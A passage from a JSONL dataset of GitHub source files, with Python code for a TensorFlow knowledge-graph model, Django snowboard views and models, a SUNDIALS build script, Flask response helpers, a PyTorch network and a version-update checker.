$\\\\tau$')\nax1.set_ylabel('Time (s)')\nax2.set_ylabel('Memory (MB)')\nax2.yaxis.set_label_position('right')\nh1, l1 = ax1.get_legend_handles_labels()\nh2, l2 = ax2.get_legend_handles_labels()\nplt.legend(h1+h2, l1+l2, loc='upper right')\n#plt.show()\nplt.savefig('stflimit.pdf')\n","repo_name":"webmasterar/multi-edsm","sub_path":"experiments/stf-limit/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8000378041","text":"#! 
usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Author:Kaiyin Zhou\n\"\"\"\n\nimport tensorflow as tf\n\nimport numpy as np\n\n\n\nclass TuckER(tf.keras.Model):\n # loader.data\n def __init__(self, loader,\n ent_vec_dim=200,\n rel_vec_dim=30,\n input_dropout=0.2,\n hidden_dropout1=0.1,\n hidden_dropout2=0.2,\n **kwargs):\n super(TuckER, self).__init__(**kwargs)\n self.rel_vec_dim = rel_vec_dim\n self.ent_vec_dim = ent_vec_dim\n self.E = tf.keras.layers.Embedding(len(loader.entities),\n ent_vec_dim)\n self.R = tf.keras.layers.Embedding(len(loader.relations),\n rel_vec_dim)\n\n self.input_dropout = tf.keras.layers.Dropout(input_dropout)\n self.hidden_dropout1 = tf.keras.layers.Dropout(hidden_dropout1)\n self.hidden_dropout2 = tf.keras.layers.Dropout(hidden_dropout2)\n\n self.bn0 = tf.keras.layers.BatchNormalization()\n self.bn1 = tf.keras.layers.BatchNormalization()\n\n self.W = tf.Variable(\n initial_value=tf.constant(\n np.random.uniform(-1, 1, (self.rel_vec_dim, self.ent_vec_dim, self.ent_vec_dim)\n ), tf.float32),\n trainable=True,\n )\n\n def call(self, e1_idx, r_idx, training=True):\n e1 = self.E(e1_idx)\n x = self.bn0(e1, training=training)\n x = self.input_dropout(x, training=training)\n x = tf.reshape(x, [-1, 1, e1.shape[1]])\n\n r = self.R(r_idx)\n W_mat = tf.matmul(r, tf.reshape(self.W, shape=[r.shape[1], -1]))\n W_mat = tf.reshape(W_mat, shape=[-1, e1.shape[1], e1.shape[1]])\n W_mat = self.hidden_dropout1(W_mat, training=training)\n x = tf.matmul(x, W_mat)\n x = tf.reshape(x, shape=[-1, e1.shape[1]])\n x = self.bn1(x, training=training)\n x = self.hidden_dropout2(x, training=training)\n x = tf.matmul(x, tf.transpose(tf.constant(self.E.get_weights()[0]), [1, 0]))\n pred = tf.math.sigmoid(x)\n return pred\n\n def predict(self, e1_idx, r_idx):\n pre = self(e1_idx, r_idx, training=False)\n return pre\n\n def get_config(self):\n config = {\n 'ent_vec_dim': self.ent_vec_dim,\n \"rel_vec_dim\": self.rel_vec_dim,\n 'input_dropout': self.input_dropout,\n \"hidden_dropout1\": self.hidden_dropout1,\n \"hidden_dropout2\": self.hidden_dropout2,\n }\n base_config = super(TuckER, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def compute_output_shape(self, input_shape):\n return input_shape\n","repo_name":"kyzhouhzau/NLPGNN","sub_path":"nlpgnn/models/tucker.py","file_name":"tucker.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"27"} +{"seq_id":"31348951179","text":"from django.shortcuts import redirect, render\nfrom django.views.generic import ListView, TemplateView\nfrom rest_framework import viewsets\n\nfrom .models import Snowboard\nfrom .process_snowboards import process_queryset, process_size_range\nfrom .serializers import SnowboardSerializer\n\n\nclass SnowboardView(viewsets.ModelViewSet):\n queryset = Snowboard.objects.all()\n serializer_class = SnowboardSerializer\n\n\nclass RiderInfoView(TemplateView):\n template_name = 'snow_form.html'\n\n def get(self, request, *arg, **kwargs):\n return render(request, self.template_name, {'name': 'Rider!'})\n\n def post(self, request, *args, **kwargs):\n global gender\n if request.method == \"POST\":\n gender = request.POST.get('gender')\n style = request.POST.get('style')\n rider_name = request.POST.get('rider_name'),\n skills = request.POST.get('skills'),\n height = request.POST.get('height')\n return redirect(\n f'/your-next-snowboard/'\n f'?rider_name={rider_name}'\n f'&gender={gender}'\n 
f'&skills={skills}'\n f'&style={style}'\n f'&height={height}'\n )\n\n\nclass YourNextSnowboardView(ListView):\n template_name = 'snowboard_list.html'\n serializer_class = SnowboardSerializer\n queryset = Snowboard.objects.all()\n\n def get(self, request, *arg, **kwargs):\n gender = request.GET.get('gender')\n skills = request.GET.get('skills')\n style = request.GET.get('style')\n height = request.GET.get('height')\n rider_name = request.GET.get('rider_name').split(\"'\")[1].split(\"'\")[0]\n filter = process_queryset(gender, skills, style)\n size_range = None\n if height:\n size_range = process_size_range(int(height), style)\n queryset = Snowboard.objects.filter(\n gender__in=[filter['gender'], 'Unisex'],\n style=filter['style'],\n level=filter['level'],\n )\n return render(request,\n self.template_name,\n {'gender': gender, 'snowboards': queryset, 'rider_name': rider_name, 'size_range': size_range})\n\n","repo_name":"AndraPopa/Django-Snowboard-API","sub_path":"snowboardsapi/snowboards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20375889819","text":"\nimport io\nimport os\nfrom os.path import join\nfrom distutils.log import info\nimport sys\n\nfrom numpy.distutils.command.build_ext import build_ext as _build_ext\nfrom numpy.distutils.system_info import get_info\nfrom numpy.distutils.extension import Extension\n\nPKGCONFIG_CVODE = 'sundials-cvode-serial'\nPKGCONFIG_IDA = 'sundials-ida-serial'\nPKGCONFIG_CVODES = 'sundials-cvodes-serial'\nPKGCONFIG_IDAS = 'sundials-idas-serial'\n\n\ndef write_pxi(filename, definitions):\n \"\"\"\n Write a cython include file (.pxi), `filename`, with the definitions in the\n `definitions` mapping.\n \"\"\"\n with io.open(filename, mode='w', encoding='utf-8') as pxi_file:\n for name, val in definitions.items():\n pxi_file.write(u\"DEF {name} = {val}\\n\".format(name=name, val=val))\n return filename\n\n\ndef check_macro_def(cmd, symbol, headers=None, include_dirs=None):\n \"\"\"\n Based on numpy.distutils.command.config:config.check_macro_true, checks if\n macro is defined or not\n \"\"\"\n cmd._check_compiler()\n body = \"\"\"\nint main(void)\n{\n#ifdef %s\n#else\n#error undefined macro\n#endif\n ;\n return 0;\n}\"\"\" % (symbol,)\n\n return cmd.try_compile(body, headers, include_dirs)\n\n\ndef get_sundials_config_pxi(include_dirs, dist):\n \"\"\"\n Create pxi file containing some of sundials build config\n\n Don't ask why this is a function, something crazy about\n distutils/numpy not setting _setup_distribution at the right time or\n something...\n \"\"\"\n SUNDIALS_CONFIG_H = \"sundials/sundials_config.h\"\n BASE_PATH = join('scikits', 'odes', 'sundials')\n\n config_cmd = dist.get_command_obj(\"config\")\n\n # Get float type\n if config_cmd.check_macro_true(\n \"SUNDIALS_DOUBLE_PRECISION\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_FLOAT_TYPE = '\"double\"'\n info(\"Found sundials built with double precision.\")\n elif config_cmd.check_macro_true(\n \"SUNDIALS_SINGLE_PRECISION\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_FLOAT_TYPE = '\"single\"'\n info(\"Found sundials built with single precision.\")\n elif config_cmd.check_macro_true(\n \"SUNDIALS_EXTENDED_PRECISION\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_FLOAT_TYPE = '\"extended\"'\n info(\"Found sundials built with extended precision.\")\n else:\n # fall back to 
double\n SUNDIALS_FLOAT_TYPE = '\"double\"'\n info(\"Failed to find sundials precision, falling back to double...\")\n\n # Get index (int) type\n if config_cmd.check_macro_true(\n \"SUNDIALS_INT32_T\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_INDEX_SIZE = '\"int32\"'\n info(\"Found sundials built with int32.\")\n elif config_cmd.check_macro_true(\n \"SUNDIALS_INT64_T\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_INDEX_SIZE = '\"64\"'\n info(\"Found sundials built with int64.\")\n else:\n # fall back to int64\n SUNDIALS_INDEX_SIZE = '\"64\"'\n info(\"Failed to find sundials index type, falling back to int64...\")\n\n # Check for blas/lapack\n if check_macro_def(\n config_cmd,\n \"SUNDIALS_BLAS_LAPACK\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n has_lapack = True\n else:\n has_lapack = False\n\n cfg = dict(\n float_type = SUNDIALS_FLOAT_TYPE,\n index_size = SUNDIALS_INDEX_SIZE,\n has_lapack = has_lapack,\n )\n\n return write_pxi(join(BASE_PATH, \"sundials_config.pxi\"), dict(\n SUNDIALS_FLOAT_TYPE=SUNDIALS_FLOAT_TYPE,\n SUNDIALS_INDEX_SIZE=SUNDIALS_INDEX_SIZE,\n SUNDIALS_BLAS_LAPACK=str(has_lapack),\n )), cfg\n\n\nclass build_ext(_build_ext):\n \"\"\"\n Custom distutils command which encapsulates api_gen pre-building,\n Cython building, and C compilation.\n \"\"\"\n def _get_cython_ext(self):\n base_path = join('scikits', 'odes', 'sundials')\n base_module = \"scikits.odes.sundials\"\n\n SUNDIALS_LIBRARIES = []\n CVODE_LIBRARIES = []\n IDA_LIBRARIES = []\n CVODES_LIBRARIES = []\n IDAS_LIBRARIES = []\n\n SUNDIALS_LIBRARY_DIRS = []\n CVODE_LIBRARY_DIRS = []\n IDA_LIBRARY_DIRS = []\n CVODES_LIBRARY_DIRS = []\n IDAS_LIBRARY_DIRS = []\n\n SUNDIALS_INCLUDE_DIRS = []\n CVODE_INCLUDE_DIRS = []\n IDA_INCLUDE_DIRS = []\n CVODES_INCLUDE_DIRS = []\n IDAS_INCLUDE_DIRS = []\n\n SUNDIALS_LIBDIR = os.environ.get(\"SUNDIALS_LIBDIR\")\n SUNDIALS_INCLUDEDIR = os.environ.get(\"SUNDIALS_INCLUDEDIR\")\n SUNDIALS_INST_PREFIX = os.environ.get(\"SUNDIALS_INST\")\n\n if SUNDIALS_LIBDIR or SUNDIALS_INCLUDEDIR:\n SUNDIALS_INCLUDE_DIRS.extend(\n [SUNDIALS_INCLUDEDIR] if SUNDIALS_INCLUDEDIR is not None else []\n )\n SUNDIALS_LIBRARY_DIRS.extend(\n [SUNDIALS_LIBDIR] if SUNDIALS_LIBDIR is not None else []\n )\n\n elif SUNDIALS_INST_PREFIX is not None:\n SUNDIALS_LIBRARY_DIRS.append(os.path.join(SUNDIALS_INST_PREFIX, \"lib\"))\n SUNDIALS_INCLUDE_DIRS.append(os.path.join(SUNDIALS_INST_PREFIX, \"include\"))\n info(\"SUNDIALS installation path set to `{}` via $SUNDIALS_INST.\".format(\n SUNDIALS_INST_PREFIX))\n else:\n info(\"Searching for SUNDIALS path...\")\n\n # use pkgconfig to find sundials\n try:\n import pkgconfig\n from pkgconfig.pkgconfig import PackageNotFoundError\n try:\n cvode_pkgconf = pkgconfig.parse(PKGCONFIG_CVODE)\n for d in cvode_pkgconf.get('library_dirs', []):\n CVODE_LIBRARY_DIRS.append(str(d))\n for d in cvode_pkgconf.get('include_dirs', []):\n CVODE_INCLUDE_DIRS.append(str(d))\n for lib in cvode_pkgconf.get('include_dirs', []):\n CVODE_LIBRARIES.append(str(lib))\n\n ida_pkgconf = pkgconfig.parse(PKGCONFIG_IDA)\n for d in ida_pkgconf.get('library_dirs', []):\n IDA_LIBRARY_DIRS.append(str(d))\n for d in ida_pkgconf.get('include_dirs', []):\n IDA_INCLUDE_DIRS.append(str(d))\n for lib in ida_pkgconf.get('include_dirs', []):\n IDA_LIBRARIES.append(str(lib))\n\n\n cvodes_pkgconf = pkgconfig.parse(PKGCONFIG_CVODES)\n for d in cvodes_pkgconf.get('library_dirs', []):\n CVODES_LIBRARY_DIRS.append(str(d))\n for d in 
cvodes_pkgconf.get('include_dirs', []):\n CVODES_INCLUDE_DIRS.append(str(d))\n for lib in cvodes_pkgconf.get('include_dirs', []):\n CVODES_LIBRARIES.append(str(lib))\n\n idas_pkgconf = pkgconfig.parse(PKGCONFIG_IDAS)\n for d in idas_pkgconf.get('library_dirs', []):\n IDAS_LIBRARY_DIRS.append(str(d))\n for d in idas_pkgconf.get('include_dirs', []):\n IDAS_INCLUDE_DIRS.append(str(d))\n for lib in idas_pkgconf.get('include_dirs', []):\n IDAS_LIBRARIES.append(str(lib))\n except (EnvironmentError, PackageNotFoundError) as e:\n pass\n except ImportError:\n info(\"pkgconfig module not found, using preset paths\")\n\n sundials_pxi, cfg = get_sundials_config_pxi(SUNDIALS_INCLUDE_DIRS,\n self.distribution)\n\n has_lapack = cfg['has_lapack']\n\n if not SUNDIALS_LIBRARIES:\n # This is where to put N_vector codes (currently only serial is\n # supported)\n SUNDIALS_LIBRARIES.append('sundials_nvecserial')\n # SUNDIALS_LIBRARIES.append('sundials_nvecopenmp')\n # SUNDIALS_LIBRARIES.append('sundials_nvecparallel')\n # SUNDIALS_LIBRARIES.append('sundials_nvecparhyp')\n # SUNDIALS_LIBRARIES.append('sundials_nvecpetsc')\n # SUNDIALS_LIBRARIES.append('sundials_nvecpthreads')\n\n # This is where to put SUNLinearSolver codes (klu not supported\n # yet)\n if has_lapack:\n SUNDIALS_LIBRARIES.append('sundials_sunlinsollapackband')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsollapackdense')\n\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolband')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsoldense')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolpcg')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolspbcgs')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolspfgmr')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolspgmr')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolsptfqmr')\n # SUNDIALS_LIBRARIES.append('sundials_sunlinsolklu')\n\n # This is where to put SUNMatrix codes\n SUNDIALS_LIBRARIES.append('sundials_sunmatrixband')\n SUNDIALS_LIBRARIES.append('sundials_sunmatrixdense')\n SUNDIALS_LIBRARIES.append('sundials_sunmatrixsparse')\n\n if not IDA_LIBRARIES:\n IDA_LIBRARIES.append('sundials_ida')\n\n if not CVODE_LIBRARIES:\n CVODE_LIBRARIES.append('sundials_cvode')\n\n if not IDAS_LIBRARIES:\n IDAS_LIBRARIES.append('sundials_idas')\n\n if not CVODES_LIBRARIES:\n CVODES_LIBRARIES.append('sundials_cvodes')\n\n if has_lapack:\n lapack_opt = get_info('lapack_opt', notfound_action=2)\n\n if lapack_opt:\n SUNDIALS_INCLUDE_DIRS.extend(lapack_opt.get('include_dirs',[]))\n SUNDIALS_LIBRARY_DIRS.extend(lapack_opt.get('library_dirs',[]))\n SUNDIALS_LIBRARIES.extend(lapack_opt.get('libraries',[]))\n info('Found LAPACK paths via lapack_opt ...')\n else:\n info('LAPACK was not found, but SUNDIALS compiled against '\n 'lapack, check your numpy installation'\n )\n\n CVODE_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n IDA_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n CVODES_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n IDAS_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n CVODE_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n IDA_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n CVODES_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n IDAS_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n CVODE_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n IDA_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n CVODES_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n IDAS_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n\n return [\n Extension(\n base_module + '.' 
+ \"common_defs\",\n sources = [join(base_path, 'common_defs.pyx')],\n include_dirs=SUNDIALS_INCLUDE_DIRS,\n library_dirs=SUNDIALS_LIBRARY_DIRS,\n libraries=SUNDIALS_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"cvode\",\n sources = [join(base_path, 'cvode.pyx')],\n include_dirs=CVODE_INCLUDE_DIRS,\n library_dirs=CVODE_LIBRARY_DIRS,\n libraries=CVODE_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"ida\",\n sources = [join(base_path, 'ida.pyx')],\n include_dirs=IDA_INCLUDE_DIRS,\n library_dirs=IDA_LIBRARY_DIRS,\n libraries=IDA_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"cvodes\",\n sources = [join(base_path, 'cvodes.pyx')],\n include_dirs=CVODES_INCLUDE_DIRS,\n library_dirs=CVODES_LIBRARY_DIRS,\n libraries=CVODES_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"idas\",\n sources = [join(base_path, 'idas.pyx')],\n include_dirs=IDAS_INCLUDE_DIRS,\n library_dirs=IDAS_LIBRARY_DIRS,\n libraries=IDAS_LIBRARIES,\n ),\n ]\n\n\n def run(self):\n \"\"\" Distutils calls this method to run the command \"\"\"\n from Cython.Build import cythonize\n self.extensions.extend(cythonize(\n self._get_cython_ext(), \n compiler_directives= {'language_level' : sys.version_info[0]})\n )\n _build_ext.run(self) # actually do the build\n\n","repo_name":"bmcage/odes","sub_path":"setup_build.py","file_name":"setup_build.py","file_ext":"py","file_size_in_byte":12718,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"27"} +{"seq_id":"41263390037","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Console script for oz_cli.\"\"\"\nimport sys\nimport os\nimport logging\nimport click\nimport networkx as nx\n\nfrom .env import env\nfrom .config import config\nfrom .graph import build_dependency_graph\n\nconfig.register('logging_config_path',\n env_key='LOG_CFG',\n default='logging.yaml')\nlog = logging.getLogger()\n\ndef setup_logging():\n path = config['logging_config_path']\n if os.path.exists(path):\n with open(path, 'rt') as f:\n logging_config = yaml.safe_load(f.read())\n logging.config.dictConfig(logging_config)\n else:\n logging.basicConfig(level=logging.INFO)\n\ndef evaluate(dag):\n for node in nx.topological_sort(dag):\n name = dag.nodes[node]['spell']['name']\n contents = dag.nodes[node]['spell']['contents']\n log.info(\"{} -> {}: {}\".format(node, name, contents))\n\n@click.command()\n@click.argument('command', nargs=1)\n@click.argument('context', nargs=-1)\ndef main(command, context):\n \"\"\"Console script for oz.\"\"\"\n setup_logging()\n\n with env['search_index'].searcher() as searcher:\n dag = build_dependency_graph(command, context, searcher)\n evaluate(dag)\n\nif __name__ == \"__main__\":\n sys.exit(main()) # pragma: no cover\n","repo_name":"shaneleonard/oz","sub_path":"oz/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5982512199","text":"import logging\nimport json\n\nfrom decimal import Decimal\nfrom datetime import datetime\nfrom flask import make_response, redirect\n\nTIME_ZERO = datetime.utcfromtimestamp(0)\n\n\ndef pack_custom_response(data_list):\n '''\n Pack proper responsed data in json for APIs\n '''\n response_data = {}\n items = []\n items_dict = {}\n shops = []\n shops_dict = {}\n\n for data in data_list:\n if data.get('title') and data.get('id'):\n if data.get('id') not in shops_dict:\n shops_dict[data.get('id')] = data\n shops.append(data)\n\n if data.get('name') and data.get('id'):\n if data.get('id') 
not in items_dict:\n items_dict[data.get('id')] = data\n items.append(data)\n\n if items:\n response_data['items'] = items\n\n if shops:\n response_data['shopping_list'] = shops\n\n return response_data\n\n\ndef json_serializer(obj):\n if isinstance(obj, Decimal):\n return float(obj)\n\n if isinstance(obj, datetime):\n return int((obj - TIME_ZERO).total_seconds() * 1000)\n\n if hasattr(obj, 'to_json'):\n return obj.to_json()\n\n raise TypeError\n\n\ndef normalize(obj):\n return json.loads(json.dumps(obj, default=json_serializer))\n\n\ndef render_error(error, description):\n error_code = {\n 'invalid_request': 400,\n 'invalid_items': 404,\n 'data_does_not_exist': 404,\n 'unknown_method': 405,\n 'too_many_requests': 429,\n 'internal_server_error': 500,\n 'unimplemented': 500,\n }\n\n response = make_response(json.dumps({'status': error_code.get(error), 'reason': description}))\n response.status_code = error_code.get(error)\n response.headers[\"Content-Type\"] = \"application/json\"\n\n logging.error('error status: %s reason: %s', error_code.get(error), description)\n\n return response\n\n\ndef render_response(code, resp_data):\n response = None\n\n if not isinstance(resp_data, str):\n response = make_response(json.dumps(\n {'status': code, 'data': resp_data}, default=json_serializer))\n else:\n response = make_response(json.dumps({'status': code, 'data': resp_data}))\n\n response.headers[\"Content-Type\"] = \"application/json\"\n\n return response\n","repo_name":"gcoolmaneric/api-server","sub_path":"apiserver/utils/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19838774742","text":"from django.contrib import admin\nfrom .models import Destination, Review\n\nclass DestinationAdmin(admin.ModelAdmin):\n list_display = ('title', 'category', 'budget')\n list_filter = ('category', 'budget')\n search_fields = ('title',)\n\nadmin.site.register(Destination, DestinationAdmin)\nadmin.site.register(Review)\n","repo_name":"veridetta/web","sub_path":"myapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11601204069","text":"import re\n\npattern = r\"((w{3})\\.[A-Za-z0-9]+(\\-[A-Za-z0-9]+)*(\\.[a-z]+)+)\"\nvalid_emails = []\nsentence = input()\nwhile True:\n if sentence == \"\":\n break\n else:\n valid_emails += [e_mail.group() for e_mail in re.finditer(pattern, sentence)]\n sentence = input()\nprint(\"\\n\".join(valid_emails))","repo_name":"petrova91/SoftUni---Courses","sub_path":"programming_fundamentals_2022/ex_regular_expressions/extract the_links.py","file_name":"extract the_links.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26157974881","text":"from django.db import models\n\nfrom bases.models import ClaseModelo\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nfrom datetime import date\n\n#################################################################################\nclass Tipo_actividad( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del tipo de actividad',\n unique=True,\n verbose_name='Descripción tipo actividad'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = 
self.descripcion.upper()\n super( Tipo_actividad, self ).save()\n\n class Meta:\n verbose_name = 'Tipo de actividad'\n verbose_name_plural = 'Tipos de actividades'\n\n\n#################################################################################\n\nclass Actividad_interna(ClaseModelo):\n\n tipo_actividad = models.ForeignKey(Tipo_actividad, on_delete=models.PROTECT)\n \n nombre = models.CharField(\n max_length=255,\n help_text='Nombre de la actividad',\n verbose_name='Nombre actividad'\n )\n\n descripcion = models.TextField(\n help_text='Descripción de la actividad',\n verbose_name='Descripción de la actividad'\n )\n\n fecha_actividad = models.DateTimeField(\n )\n\n lugar_actividad = models.CharField(max_length=255)\n\n solo_miembros = models.BooleanField(default=False\n )\n\n\n def save(self):\n self.nombre = self.nombre.upper()\n self.descripcion = self.descripcion.capitalize()\n self.lugar_actividad = self.lugar_actividad.upper()\n super( Actividad_interna, self ).save()\n \n def __str__(self):\n return '{}'.format( self.nombre)\n\n class Meta:\n verbose_name = 'Actividad interna'\n verbose_name_plural = 'Actividades internas'\n","repo_name":"davalerova/ieee-etitc","sub_path":"actividad_interna/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42628632284","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass SRNet(nn.Module):\n def __init__(self, in_channels, n_features):\n super(SRNet, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels, n_features, [2, 2], stride=1, padding=0, dilation=1)\n self.conv2 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv3 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv4 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv5 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv6 = nn.Conv2d(n_features, in_channels, 1, stride=1, padding=0, dilation=1)\n\n # Init weights\n for m in self.modules():\n classname = m.__class__.__name__\n if classname.lower().find('conv') != -1:\n nn.init.kaiming_normal_(m.weight)\n nn.init.constant_(m.bias, 0)\n elif classname.find('bn') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(F.relu(x))\n x = self.conv3(F.relu(x))\n x = self.conv4(F.relu(x))\n x = self.conv5(F.relu(x))\n x = self.conv6(F.relu(x))\n return x","repo_name":"sclzsx/restoration_lut","sub_path":"models/srlut.py","file_name":"srlut.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12767028445","text":"#!/usr/bin/python\n# coding=utf-8\n\n\nimport os\nfrom typing import Tuple, Union\n\nfrom urllib.error import URLError\nfrom urllib.request import Request\nfrom urllib.request import urlopen\n\n\nUPDATE_DURATION = 3600\n\nSCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))\nEC_DIR = os.path.abspath('%s/..' 
% SCRIPT_DIR)\n\nimport time # used by launch() at module level, not only under __main__\n\n# User Agent\nUA_CHROME = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0)' \\\n ' AppleWebKit/535.11 (KHTML, like Gecko)' \\\n ' Chrome/17.0.963.56 Safari/535.11'\n\n# VERSION URL\nURL_VERSION = 'https://raw.githubusercontent.com/vancebs/EasyCoding3/master/VERSION'\n\n# VERSION_FILE\nLOCAL_VERSION = '%s/VERSION' % EC_DIR\n\n# Config file\nLAST_CHECK_FILE = '%s/.check' % EC_DIR\nHAS_UPDATE_FILE = '%s/.update' % EC_DIR\n\n\ndef launch():\n # check has update file\n if os.path.exists(HAS_UPDATE_FILE):\n # Printer.green_line('Update already detected')\n return # already found update\n\n # get current time & last check time\n curr_time = int(time.time())\n last_time = get_last_check()[0]\n\n # check whether should do update check\n delta_time = curr_time - last_time\n if delta_time <= UPDATE_DURATION:\n # set_last_check(last_time,\n # 'Unnecessary to update. Next update window after %ss' % (UPDATE_DURATION - delta_time))\n return # unnecessary to update\n\n # update last check time\n set_last_check(curr_time, 'Checking version...')\n\n # get local version\n local_version = get_last_version()\n\n # get remote version (http_get returns None on failure, so check before stripping)\n remote_version = http_get(URL_VERSION)\n if remote_version is None:\n set_last_check(last_time, 'Get remote version failed! Check again next time.') # failed. save last check time\n return\n remote_version = remote_version.strip()\n\n # check need update\n need_update = remote_version != local_version\n\n # do update if necessary\n if not need_update:\n msg = 'Up to date!! local: [%s], remote: [%s]' % (local_version, remote_version)\n set_last_check(curr_time, msg)\n else:\n msg = 'Need update! local: [%s], remote: [%s]' % (local_version, remote_version)\n set_last_check(curr_time, msg)\n set_has_update(remote_version)\n\n\ndef get_last_version() -> str:\n if os.path.exists(LOCAL_VERSION):\n with open(LOCAL_VERSION, 'r') as file:\n return file.readline().strip()\n else:\n return '0'\n\n\ndef get_last_check() -> Tuple[int, str]:\n if os.path.exists(LAST_CHECK_FILE):\n with open(LAST_CHECK_FILE, 'r') as file:\n return int(file.readline().strip()), file.readline().strip()\n else:\n return 0, ''\n\n\ndef set_last_check(timestamp: int, msg: str):\n with open(LAST_CHECK_FILE, 'w') as file:\n file.write('%s\\n%s\\n' % (timestamp, msg))\n\n\ndef set_has_update(version: str):\n with open(HAS_UPDATE_FILE, 'w') as file:\n file.write('%s\\n' % version)\n\n\ndef http_get(url: str) -> Union[None, str]:\n try:\n request = Request(url=url, headers={'User-Agent': UA_CHROME})\n response = urlopen(request, timeout=5)\n return response.read().decode()\n except URLError:\n return None\n\n\nif __name__ == \"__main__\":\n time.sleep(1)\n launch()\n","repo_name":"vancebs/EasyCoding3","sub_path":"script/CheckUpdate.py","file_name":"CheckUpdate.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"11684959721","text":"class Permutation:\r\n def __init__(self, a):\r\n if isinstance(a,list):\r\n res = []\r\n for i in range(len(a)):\r\n res.append(a[i]-1)\r\n self.a = res\r\n else:\r\n self.a = a\r\n self.n = len(self.a)\r\n \r\n def copy(self):\r\n return Permutation([i+1 for i in self.a])\r\n \r\n def __mul__(self, other):\r\n assert isinstance(other, Permutation)\r\n assert len(other.a) == len(self.a)\r\n return Permutation([self[other[i]] for i in range(1,self.n+1)])\r\n \r\n def __pow__(self, other):\r\n if other == 1:\r\n return self.copy()\r\n elif other > 0:\r\n t = (self**(other//2))\r\n if other % 
